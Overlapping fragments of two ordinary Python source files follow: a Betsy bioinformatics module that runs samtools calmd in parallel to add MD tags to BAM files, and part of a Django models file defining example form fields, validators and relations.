"user_options, num_cores, out_path): import os from genomicode import config from genomicode import filelib",
"in jobs: in_filename, log_filename, out_filename = x # samtools calmd -b <in.bam> <ref.fasta>",
"pysam #sys.path = sys_path_old bam_node, ref_node = antecedents bam_filenames = module_utils.find_bam_files(bam_node.identifier) assert bam_filenames,",
"sys.path[:] #sys.path = [x for x in sys.path if x.find(\"RSeQC\") < 0] #import",
"the files already have MD tags, then just symlink the ## files. Don't",
"x in jobs: in_filename, log_filename, out_filename = x # samtools calmd -b <in.bam>",
"completed successfully. x = [x[-1] for x in jobs] filelib.assert_exists_nz_many(x) def name_outfile(self, antecedents,",
"Pipe stderr to different file. x = [ samtools, \"calmd\", \"-b\", sq(in_filename), sq(ref.fasta_file_full),",
"1 # continue # # Has MD tags. Just symlink and continue. #",
"'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 -> 19 # Pipe stderr to different file. x = [",
"error: # [bam_fillmd1] different NM for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 -> 19 #",
"from Module import AbstractModule class Module(AbstractModule): def __init__(self): AbstractModule.__init__(self) def run( self, network,",
"out_filename) # del jobs[i] # Make a list of samtools commands. # Takes",
"\"rb\") # align = handle.next() # tag_dict = dict(align.tags) # if \"MD\" not",
"= [] for in_filename in bam_filenames: p, f = os.path.split(in_filename) s, ext =",
"# samtools calmd -b <in.bam> <ref.fasta> > <out.bam> # May generate error: #",
"x = [x[-1] for x in jobs] filelib.assert_exists_nz_many(x) def name_outfile(self, antecedents, user_options): return",
"## Importing pysam is hard! #import sys #sys_path_old = sys.path[:] #sys.path = [x",
"= [ samtools, \"calmd\", \"-b\", sq(in_filename), sq(ref.fasta_file_full), ] x = \" \".join(x) x",
"Importing pysam is hard! #import sys #sys_path_old = sys.path[:] #sys.path = [x for",
"issue. samtools = filelib.which_assert(config.samtools) sq = parallel.quote commands = [] for x in",
"Betsy import module_utils ## Importing pysam is hard! #import sys #sys_path_old = sys.path[:]",
"= os.path.join(out_path, f) assert in_filename != out_filename x = in_filename, log_filename, out_filename jobs.append(x)",
"commands.append(x) parallel.pshell(commands, max_procs=num_cores) # Make sure the analysis completed successfully. x = [x[-1]",
"it. ## If the files already have MD tags, then just symlink the",
"NM, NH in # summarize_alignment_cigar. To be sure, just redo it. ## If",
"> <out.bam> # May generate error: # [bam_fillmd1] different NM for read #",
"= filelib.which_assert(config.samtools) sq = parallel.quote commands = [] for x in jobs: in_filename,",
"def __init__(self): AbstractModule.__init__(self) def run( self, network, antecedents, out_attributes, user_options, num_cores, out_path): import",
"s) out_filename = os.path.join(out_path, f) assert in_filename != out_filename x = in_filename, log_filename,",
"redo it. ## If the files already have MD tags, then just symlink",
"genomicode import parallel from genomicode import alignlib from Betsy import module_utils ## Importing",
"out_attributes, user_options, num_cores, out_path): import os from genomicode import config from genomicode import",
"continue. # os.symlink(in_filename, out_filename) # del jobs[i] # Make a list of samtools",
"# del jobs[i] # Make a list of samtools commands. # Takes ~200",
"antecedents, out_attributes, user_options, num_cores, out_path): import os from genomicode import config from genomicode",
"~200 Mb per process, so should not be a big issue. samtools =",
"samtools, \"calmd\", \"-b\", sq(in_filename), sq(ref.fasta_file_full), ] x = \" \".join(x) x = \"%s",
"ref = alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) # list of (in_filename, err_filename, out_filename) jobs = []",
"= \"%s 2> %s 1> %s\" % (x, sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores)",
"network, antecedents, out_attributes, user_options, num_cores, out_path): import os from genomicode import config from",
"pysam.AlignmentFile(in_filename, \"rb\") # align = handle.next() # tag_dict = dict(align.tags) # if \"MD\"",
"in bam_filenames: p, f = os.path.split(in_filename) s, ext = os.path.splitext(f) log_filename = os.path.join(out_path,",
"# tag_dict = dict(align.tags) # if \"MD\" not in tag_dict: # i +=",
"from Betsy import module_utils ## Importing pysam is hard! #import sys #sys_path_old =",
"\"No .bam files.\" ref = alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) # list of (in_filename, err_filename, out_filename)",
"a list of samtools commands. # Takes ~200 Mb per process, so should",
"= in_filename, log_filename, out_filename jobs.append(x) # Don't do this. Need MD, NM, NH",
"# [bam_fillmd1] different NM for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 -> 19 # Pipe",
"os from genomicode import config from genomicode import filelib from genomicode import parallel",
"samtools commands. # Takes ~200 Mb per process, so should not be a",
"have MD tags, then just symlink the ## files. Don't add again. #i",
"x.find(\"RSeQC\") < 0] #import pysam #sys.path = sys_path_old bam_node, ref_node = antecedents bam_filenames",
"align = handle.next() # tag_dict = dict(align.tags) # if \"MD\" not in tag_dict:",
"<out.bam> # May generate error: # [bam_fillmd1] different NM for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014':",
"log_filename, out_filename jobs.append(x) # Don't do this. Need MD, NM, NH in #",
"Don't add again. #i = 0 #while i < len(jobs): # in_filename, out_filename",
"tag_dict: # i += 1 # continue # # Has MD tags. Just",
"\"%s.log\" % s) out_filename = os.path.join(out_path, f) assert in_filename != out_filename x =",
"Just symlink and continue. # os.symlink(in_filename, out_filename) # del jobs[i] # Make a",
"%s\" % (x, sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores) # Make sure the analysis",
"\"MD\" not in tag_dict: # i += 1 # continue # # Has",
"Module import AbstractModule class Module(AbstractModule): def __init__(self): AbstractModule.__init__(self) def run( self, network, antecedents,",
"class Module(AbstractModule): def __init__(self): AbstractModule.__init__(self) def run( self, network, antecedents, out_attributes, user_options, num_cores,",
"sq = parallel.quote commands = [] for x in jobs: in_filename, log_filename, out_filename",
"summarize_alignment_cigar. To be sure, just redo it. ## If the files already have",
"stderr to different file. x = [ samtools, \"calmd\", \"-b\", sq(in_filename), sq(ref.fasta_file_full), ]",
"if \"MD\" not in tag_dict: # i += 1 # continue # #",
"just redo it. ## If the files already have MD tags, then just",
"<reponame>jefftc/changlab<filename>Betsy/Betsy/modules/add_md_tags_to_bam_folder.py from Module import AbstractModule class Module(AbstractModule): def __init__(self): AbstractModule.__init__(self) def run( self,",
"so should not be a big issue. samtools = filelib.which_assert(config.samtools) sq = parallel.quote",
"Has MD tags. Just symlink and continue. # os.symlink(in_filename, out_filename) # del jobs[i]",
"alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) # list of (in_filename, err_filename, out_filename) jobs = [] for in_filename",
"sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores) # Make sure the analysis completed successfully. x =",
"Takes ~200 Mb per process, so should not be a big issue. samtools",
"for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 -> 19 # Pipe stderr to different file.",
"max_procs=num_cores) # Make sure the analysis completed successfully. x = [x[-1] for x",
"\".join(x) x = \"%s 2> %s 1> %s\" % (x, sq(log_filename), sq(out_filename)) commands.append(x)",
"be sure, just redo it. ## If the files already have MD tags,",
"x = \"%s 2> %s 1> %s\" % (x, sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands,",
"then just symlink the ## files. Don't add again. #i = 0 #while",
"0 #while i < len(jobs): # in_filename, out_filename = jobs[i] # # handle",
"import AbstractModule class Module(AbstractModule): def __init__(self): AbstractModule.__init__(self) def run( self, network, antecedents, out_attributes,",
"commands. # Takes ~200 Mb per process, so should not be a big",
"generate error: # [bam_fillmd1] different NM for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 -> 19",
"# Make a list of samtools commands. # Takes ~200 Mb per process,",
"= pysam.AlignmentFile(in_filename, \"rb\") # align = handle.next() # tag_dict = dict(align.tags) # if",
"(x, sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores) # Make sure the analysis completed successfully.",
"in_filename != out_filename x = in_filename, log_filename, out_filename jobs.append(x) # Don't do this.",
"do this. Need MD, NM, NH in # summarize_alignment_cigar. To be sure, just",
"19 # Pipe stderr to different file. x = [ samtools, \"calmd\", \"-b\",",
"= sys.path[:] #sys.path = [x for x in sys.path if x.find(\"RSeQC\") < 0]",
"should not be a big issue. samtools = filelib.which_assert(config.samtools) sq = parallel.quote commands",
"genomicode import config from genomicode import filelib from genomicode import parallel from genomicode",
"#sys.path = sys_path_old bam_node, ref_node = antecedents bam_filenames = module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No",
"i += 1 # continue # # Has MD tags. Just symlink and",
"parallel from genomicode import alignlib from Betsy import module_utils ## Importing pysam is",
"!= out_filename x = in_filename, log_filename, out_filename jobs.append(x) # Don't do this. Need",
"filelib.safe_mkdir(out_path) # list of (in_filename, err_filename, out_filename) jobs = [] for in_filename in",
"# # Has MD tags. Just symlink and continue. # os.symlink(in_filename, out_filename) #",
"= 0 #while i < len(jobs): # in_filename, out_filename = jobs[i] # #",
"os.path.splitext(f) log_filename = os.path.join(out_path, \"%s.log\" % s) out_filename = os.path.join(out_path, f) assert in_filename",
"already have MD tags, then just symlink the ## files. Don't add again.",
"NH in # summarize_alignment_cigar. To be sure, just redo it. ## If the",
"import module_utils ## Importing pysam is hard! #import sys #sys_path_old = sys.path[:] #sys.path",
"#sys_path_old = sys.path[:] #sys.path = [x for x in sys.path if x.find(\"RSeQC\") <",
"= [x for x in sys.path if x.find(\"RSeQC\") < 0] #import pysam #sys.path",
"handle = pysam.AlignmentFile(in_filename, \"rb\") # align = handle.next() # tag_dict = dict(align.tags) #",
"[bam_fillmd1] different NM for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 -> 19 # Pipe stderr",
"file. x = [ samtools, \"calmd\", \"-b\", sq(in_filename), sq(ref.fasta_file_full), ] x = \"",
"x = [ samtools, \"calmd\", \"-b\", sq(in_filename), sq(ref.fasta_file_full), ] x = \" \".join(x)",
"genomicode import alignlib from Betsy import module_utils ## Importing pysam is hard! #import",
"import config from genomicode import filelib from genomicode import parallel from genomicode import",
"= sys_path_old bam_node, ref_node = antecedents bam_filenames = module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No .bam",
"# May generate error: # [bam_fillmd1] different NM for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0",
"# i += 1 # continue # # Has MD tags. Just symlink",
"Make a list of samtools commands. # Takes ~200 Mb per process, so",
"AbstractModule class Module(AbstractModule): def __init__(self): AbstractModule.__init__(self) def run( self, network, antecedents, out_attributes, user_options,",
"in # summarize_alignment_cigar. To be sure, just redo it. ## If the files",
"Module(AbstractModule): def __init__(self): AbstractModule.__init__(self) def run( self, network, antecedents, out_attributes, user_options, num_cores, out_path):",
"files. Don't add again. #i = 0 #while i < len(jobs): # in_filename,",
"bam_filenames: p, f = os.path.split(in_filename) s, ext = os.path.splitext(f) log_filename = os.path.join(out_path, \"%s.log\"",
"sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores) # Make sure the analysis completed successfully. x",
"import os from genomicode import config from genomicode import filelib from genomicode import",
"module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No .bam files.\" ref = alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) # list of",
"jobs = [] for in_filename in bam_filenames: p, f = os.path.split(in_filename) s, ext",
"#while i < len(jobs): # in_filename, out_filename = jobs[i] # # handle =",
"big issue. samtools = filelib.which_assert(config.samtools) sq = parallel.quote commands = [] for x",
"different file. x = [ samtools, \"calmd\", \"-b\", sq(in_filename), sq(ref.fasta_file_full), ] x =",
"<ref.fasta> > <out.bam> # May generate error: # [bam_fillmd1] different NM for read",
"AbstractModule.__init__(self) def run( self, network, antecedents, out_attributes, user_options, num_cores, out_path): import os from",
"self, network, antecedents, out_attributes, user_options, num_cores, out_path): import os from genomicode import config",
"for x in jobs: in_filename, log_filename, out_filename = x # samtools calmd -b",
"= [] for x in jobs: in_filename, log_filename, out_filename = x # samtools",
"in_filename, log_filename, out_filename jobs.append(x) # Don't do this. Need MD, NM, NH in",
"= \" \".join(x) x = \"%s 2> %s 1> %s\" % (x, sq(log_filename),",
"sys.path if x.find(\"RSeQC\") < 0] #import pysam #sys.path = sys_path_old bam_node, ref_node =",
"% s) out_filename = os.path.join(out_path, f) assert in_filename != out_filename x = in_filename,",
"num_cores, out_path): import os from genomicode import config from genomicode import filelib from",
"x # samtools calmd -b <in.bam> <ref.fasta> > <out.bam> # May generate error:",
"MD, NM, NH in # summarize_alignment_cigar. To be sure, just redo it. ##",
"sys #sys_path_old = sys.path[:] #sys.path = [x for x in sys.path if x.find(\"RSeQC\")",
"files.\" ref = alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) # list of (in_filename, err_filename, out_filename) jobs =",
"calmd -b <in.bam> <ref.fasta> > <out.bam> # May generate error: # [bam_fillmd1] different",
"symlink the ## files. Don't add again. #i = 0 #while i <",
"sure the analysis completed successfully. x = [x[-1] for x in jobs] filelib.assert_exists_nz_many(x)",
"different NM for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 -> 19 # Pipe stderr to",
"bam_node, ref_node = antecedents bam_filenames = module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No .bam files.\" ref",
"os.symlink(in_filename, out_filename) # del jobs[i] # Make a list of samtools commands. #",
"parallel.pshell(commands, max_procs=num_cores) # Make sure the analysis completed successfully. x = [x[-1] for",
"tags, then just symlink the ## files. Don't add again. #i = 0",
"jobs[i] # Make a list of samtools commands. # Takes ~200 Mb per",
"commands = [] for x in jobs: in_filename, log_filename, out_filename = x #",
"tag_dict = dict(align.tags) # if \"MD\" not in tag_dict: # i += 1",
"Mb per process, so should not be a big issue. samtools = filelib.which_assert(config.samtools)",
"# Pipe stderr to different file. x = [ samtools, \"calmd\", \"-b\", sq(in_filename),",
"# os.symlink(in_filename, out_filename) # del jobs[i] # Make a list of samtools commands.",
"log_filename = os.path.join(out_path, \"%s.log\" % s) out_filename = os.path.join(out_path, f) assert in_filename !=",
"[ samtools, \"calmd\", \"-b\", sq(in_filename), sq(ref.fasta_file_full), ] x = \" \".join(x) x =",
"from genomicode import filelib from genomicode import parallel from genomicode import alignlib from",
"in_filename, out_filename = jobs[i] # # handle = pysam.AlignmentFile(in_filename, \"rb\") # align =",
"in_filename in bam_filenames: p, f = os.path.split(in_filename) s, ext = os.path.splitext(f) log_filename =",
"# 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 -> 19 # Pipe stderr to different file. x =",
"2> %s 1> %s\" % (x, sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores) # Make",
"# align = handle.next() # tag_dict = dict(align.tags) # if \"MD\" not in",
"per process, so should not be a big issue. samtools = filelib.which_assert(config.samtools) sq",
"to different file. x = [ samtools, \"calmd\", \"-b\", sq(in_filename), sq(ref.fasta_file_full), ] x",
"MD tags. Just symlink and continue. # os.symlink(in_filename, out_filename) # del jobs[i] #",
"sq(ref.fasta_file_full), ] x = \" \".join(x) x = \"%s 2> %s 1> %s\"",
"os.path.join(out_path, f) assert in_filename != out_filename x = in_filename, log_filename, out_filename jobs.append(x) #",
"\"%s 2> %s 1> %s\" % (x, sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores) #",
"log_filename, out_filename = x # samtools calmd -b <in.bam> <ref.fasta> > <out.bam> #",
"[] for in_filename in bam_filenames: p, f = os.path.split(in_filename) s, ext = os.path.splitext(f)",
"0 -> 19 # Pipe stderr to different file. x = [ samtools,",
"out_filename = os.path.join(out_path, f) assert in_filename != out_filename x = in_filename, log_filename, out_filename",
"%s 1> %s\" % (x, sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores) # Make sure",
"= parallel.quote commands = [] for x in jobs: in_filename, log_filename, out_filename =",
"from genomicode import parallel from genomicode import alignlib from Betsy import module_utils ##",
"bam_filenames, \"No .bam files.\" ref = alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) # list of (in_filename, err_filename,",
"os.path.split(in_filename) s, ext = os.path.splitext(f) log_filename = os.path.join(out_path, \"%s.log\" % s) out_filename =",
"ext = os.path.splitext(f) log_filename = os.path.join(out_path, \"%s.log\" % s) out_filename = os.path.join(out_path, f)",
"bam_filenames = module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No .bam files.\" ref = alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) #",
"x in sys.path if x.find(\"RSeQC\") < 0] #import pysam #sys.path = sys_path_old bam_node,",
"# Has MD tags. Just symlink and continue. # os.symlink(in_filename, out_filename) # del",
"in tag_dict: # i += 1 # continue # # Has MD tags.",
"] x = \" \".join(x) x = \"%s 2> %s 1> %s\" %",
"-> 19 # Pipe stderr to different file. x = [ samtools, \"calmd\",",
"#sys.path = [x for x in sys.path if x.find(\"RSeQC\") < 0] #import pysam",
"from genomicode import config from genomicode import filelib from genomicode import parallel from",
"add again. #i = 0 #while i < len(jobs): # in_filename, out_filename =",
"= module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No .bam files.\" ref = alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) # list",
"import alignlib from Betsy import module_utils ## Importing pysam is hard! #import sys",
"this. Need MD, NM, NH in # summarize_alignment_cigar. To be sure, just redo",
"[] for x in jobs: in_filename, log_filename, out_filename = x # samtools calmd",
"[x for x in sys.path if x.find(\"RSeQC\") < 0] #import pysam #sys.path =",
"from genomicode import alignlib from Betsy import module_utils ## Importing pysam is hard!",
"< len(jobs): # in_filename, out_filename = jobs[i] # # handle = pysam.AlignmentFile(in_filename, \"rb\")",
"in_filename, log_filename, out_filename = x # samtools calmd -b <in.bam> <ref.fasta> > <out.bam>",
"def run( self, network, antecedents, out_attributes, user_options, num_cores, out_path): import os from genomicode",
"a big issue. samtools = filelib.which_assert(config.samtools) sq = parallel.quote commands = [] for",
"process, so should not be a big issue. samtools = filelib.which_assert(config.samtools) sq =",
"\"-b\", sq(in_filename), sq(ref.fasta_file_full), ] x = \" \".join(x) x = \"%s 2> %s",
"alignlib from Betsy import module_utils ## Importing pysam is hard! #import sys #sys_path_old",
"= handle.next() # tag_dict = dict(align.tags) # if \"MD\" not in tag_dict: #",
"jobs[i] # # handle = pysam.AlignmentFile(in_filename, \"rb\") # align = handle.next() # tag_dict",
"f) assert in_filename != out_filename x = in_filename, log_filename, out_filename jobs.append(x) # Don't",
"pysam is hard! #import sys #sys_path_old = sys.path[:] #sys.path = [x for x",
"<in.bam> <ref.fasta> > <out.bam> # May generate error: # [bam_fillmd1] different NM for",
"in sys.path if x.find(\"RSeQC\") < 0] #import pysam #sys.path = sys_path_old bam_node, ref_node",
"again. #i = 0 #while i < len(jobs): # in_filename, out_filename = jobs[i]",
"NM for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 -> 19 # Pipe stderr to different",
"#import sys #sys_path_old = sys.path[:] #sys.path = [x for x in sys.path if",
"Need MD, NM, NH in # summarize_alignment_cigar. To be sure, just redo it.",
"handle.next() # tag_dict = dict(align.tags) # if \"MD\" not in tag_dict: # i",
"# Don't do this. Need MD, NM, NH in # summarize_alignment_cigar. To be",
"os.path.join(out_path, \"%s.log\" % s) out_filename = os.path.join(out_path, f) assert in_filename != out_filename x",
"\"calmd\", \"-b\", sq(in_filename), sq(ref.fasta_file_full), ] x = \" \".join(x) x = \"%s 2>",
"-b <in.bam> <ref.fasta> > <out.bam> # May generate error: # [bam_fillmd1] different NM",
"i < len(jobs): # in_filename, out_filename = jobs[i] # # handle = pysam.AlignmentFile(in_filename,",
"Make sure the analysis completed successfully. x = [x[-1] for x in jobs]",
"list of (in_filename, err_filename, out_filename) jobs = [] for in_filename in bam_filenames: p,",
"not in tag_dict: # i += 1 # continue # # Has MD",
"May generate error: # [bam_fillmd1] different NM for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 ->",
"if x.find(\"RSeQC\") < 0] #import pysam #sys.path = sys_path_old bam_node, ref_node = antecedents",
"samtools = filelib.which_assert(config.samtools) sq = parallel.quote commands = [] for x in jobs:",
"= os.path.join(out_path, \"%s.log\" % s) out_filename = os.path.join(out_path, f) assert in_filename != out_filename",
"MD tags, then just symlink the ## files. Don't add again. #i =",
"# continue # # Has MD tags. Just symlink and continue. # os.symlink(in_filename,",
"symlink and continue. # os.symlink(in_filename, out_filename) # del jobs[i] # Make a list",
"# # handle = pysam.AlignmentFile(in_filename, \"rb\") # align = handle.next() # tag_dict =",
"1> %s\" % (x, sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores) # Make sure the",
"# summarize_alignment_cigar. To be sure, just redo it. ## If the files already",
"p, f = os.path.split(in_filename) s, ext = os.path.splitext(f) log_filename = os.path.join(out_path, \"%s.log\" %",
".bam files.\" ref = alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) # list of (in_filename, err_filename, out_filename) jobs",
"sq(in_filename), sq(ref.fasta_file_full), ] x = \" \".join(x) x = \"%s 2> %s 1>",
"for x in sys.path if x.find(\"RSeQC\") < 0] #import pysam #sys.path = sys_path_old",
"+= 1 # continue # # Has MD tags. Just symlink and continue.",
"out_filename = jobs[i] # # handle = pysam.AlignmentFile(in_filename, \"rb\") # align = handle.next()",
"sys_path_old bam_node, ref_node = antecedents bam_filenames = module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No .bam files.\"",
"## If the files already have MD tags, then just symlink the ##",
"#i = 0 #while i < len(jobs): # in_filename, out_filename = jobs[i] #",
"To be sure, just redo it. ## If the files already have MD",
"(in_filename, err_filename, out_filename) jobs = [] for in_filename in bam_filenames: p, f =",
"= [x[-1] for x in jobs] filelib.assert_exists_nz_many(x) def name_outfile(self, antecedents, user_options): return \"md.bam\"",
"of samtools commands. # Takes ~200 Mb per process, so should not be",
"config from genomicode import filelib from genomicode import parallel from genomicode import alignlib",
"analysis completed successfully. x = [x[-1] for x in jobs] filelib.assert_exists_nz_many(x) def name_outfile(self,",
"__init__(self): AbstractModule.__init__(self) def run( self, network, antecedents, out_attributes, user_options, num_cores, out_path): import os",
"assert in_filename != out_filename x = in_filename, log_filename, out_filename jobs.append(x) # Don't do",
"out_filename x = in_filename, log_filename, out_filename jobs.append(x) # Don't do this. Need MD,",
"x = in_filename, log_filename, out_filename jobs.append(x) # Don't do this. Need MD, NM,",
"and continue. # os.symlink(in_filename, out_filename) # del jobs[i] # Make a list of",
"= dict(align.tags) # if \"MD\" not in tag_dict: # i += 1 #",
"0] #import pysam #sys.path = sys_path_old bam_node, ref_node = antecedents bam_filenames = module_utils.find_bam_files(bam_node.identifier)",
"If the files already have MD tags, then just symlink the ## files."
] |
[
"'Only options A-C may be chosen', 'regex') ]) comment = models.TextField(null=True, blank=True) class",
"mask. 1=apartment_number, ..., 32=delay item_type = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'),",
"= models.CharField(max_length=20, help_text='Name field', verbose_name='Name field', null=True, blank=True) class BasicFields(models.Model): \"\"\" Shows basic",
"its source primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field = models.ForeignKey(",
"= models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5,",
"), null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True,",
"related_name='hyper_identity' ) def __str__(self): return 'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows how",
"field with choices', verbose_name='Integer field with choices') bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean field')",
"model_field = models.? # Relations # string_related_field, which is always read_only is defined",
"be chosen', 'regex') ]) comment = models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\" Shows dynamically",
"be interesting: will a blank value pass the Min validator? It should! MinValueValidator(5),",
"string starting with two characters, followed by up to 8 numbers') ]) enabled",
"choice_field = models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field",
"blank=True, help_text='Now that you have shown me, please enter something') class PageLoad(models.Model): \"\"\"",
"models.FileField(upload_to='examples2/', null=True, blank=True) image_field = models.ImageField(upload_to='examples/', null=True, blank=True) # Model attribute for ReadOnlyField",
"(0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'), ))",
"Model attribute for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property def readonly_field(self): return self.hidden_field >",
"many records in ViewSet result \"\"\" description = models.CharField(max_length=20, help_text='Item description') choice =",
"bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name = models.CharField(max_length=20, help_text='Name field', verbose_name='Name field',",
"import timezone class Validated(models.Model): \"\"\" Shows validation capabilities \"\"\" code = models.CharField(max_length=10, validators=[",
"model \"\"\" name = models.CharField(max_length=16) def __str__(self): return self.name class AdvancedFields(models.Model): \"\"\" Shows",
"different refresh types \"\"\" description = models.CharField(max_length=20, help_text='Item description') rich_text_field = models.TextField(blank=True, null=True)",
"Relations # string_related_field, which is always read_only is defined only in serializer #",
"to 8 numbers') ]) enabled = models.BooleanField() amount = models.IntegerField(null=True, blank=True, validators=[ #",
"class RefreshType(models.Model): \"\"\" Shows how DynamicForms handles different refresh types \"\"\" description =",
"image_field = models.ImageField(upload_to='examples/', null=True, blank=True) # Model attribute for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now)",
"serializer_method_field = models.? # model_field = models.? # Relations # string_related_field, which is",
"\"\"\" Shows how DynamicForms handles filers \"\"\" char_field = models.CharField(max_length=20, help_text='Char field', verbose_name='Char",
"source primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field = models.ForeignKey( Relation,",
"date_field = models.DateField(null=True) time_field = models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32)",
"# list_field = models.? # dict_field = models.? \"\"\"JSONField available only for PostgreSQL\"\"\"",
") slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field = models.ManyToManyField( Relation,",
"fields in DynamicForms \"\"\" regex_field = models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8) single_choice_field =",
"by up to 8 numbers') ]) enabled = models.BooleanField() amount = models.IntegerField(null=True, blank=True,",
"may be chosen', 'regex') ]) comment = models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\" Shows",
"models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\" Model related",
"__str__(self): return 'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows how DynamicForms handles different",
"'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows how DynamicForms handles different refresh types",
"null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True) image_field = models.ImageField(upload_to='examples/', null=True, blank=True) #",
"import models from django.utils import timezone class Validated(models.Model): \"\"\" Shows validation capabilities \"\"\"",
"null=True, blank=True) class BasicFields(models.Model): \"\"\" Shows basic available fields in DynamicForms \"\"\" boolean_field",
"field') datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer field')",
"= models.CharField(max_length=16) def __str__(self): return self.name class AdvancedFields(models.Model): \"\"\" Shows advanced available fields",
"field') unit = models.CharField(max_length=10, choices=( (None, 'No additional data'), ('pcs', 'Pieces'), ('wt', 'Weight'),",
"validators=[ # This one should be interesting: will a blank value pass the",
"'Please enter a string starting with two characters, followed by up to 8",
"filers \"\"\" char_field = models.CharField(max_length=20, help_text='Char field', verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime field',",
"char_field = models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field = models.URLField(null=True)",
"1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'),), help_text='Integer field with",
"which is always read_only is defined only in serializer # and primary_key_related_field is",
"models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True) float_field =",
"models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field =",
"= models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\" Model",
"models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice 2'), (3, 'Choice 3')), null=False, blank=False, default=1) class",
"should! MinValueValidator(5), MaxValueValidator(10) ]) # Bit mask. 1=apartment_number, ..., 32=delay item_type = models.IntegerField(choices=(",
"that you have shown me, please enter something') class PageLoad(models.Model): \"\"\" Shows how",
"models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True)",
"models.DateField(null=True) time_field = models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32) class Relation(models.Model):",
"null=True, related_name='hyper_identity' ) def __str__(self): return 'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows",
"it in form ('A', 'A'), ('B', 'B'), ('C', 'C'), ('D', 'D'), ), validators=[",
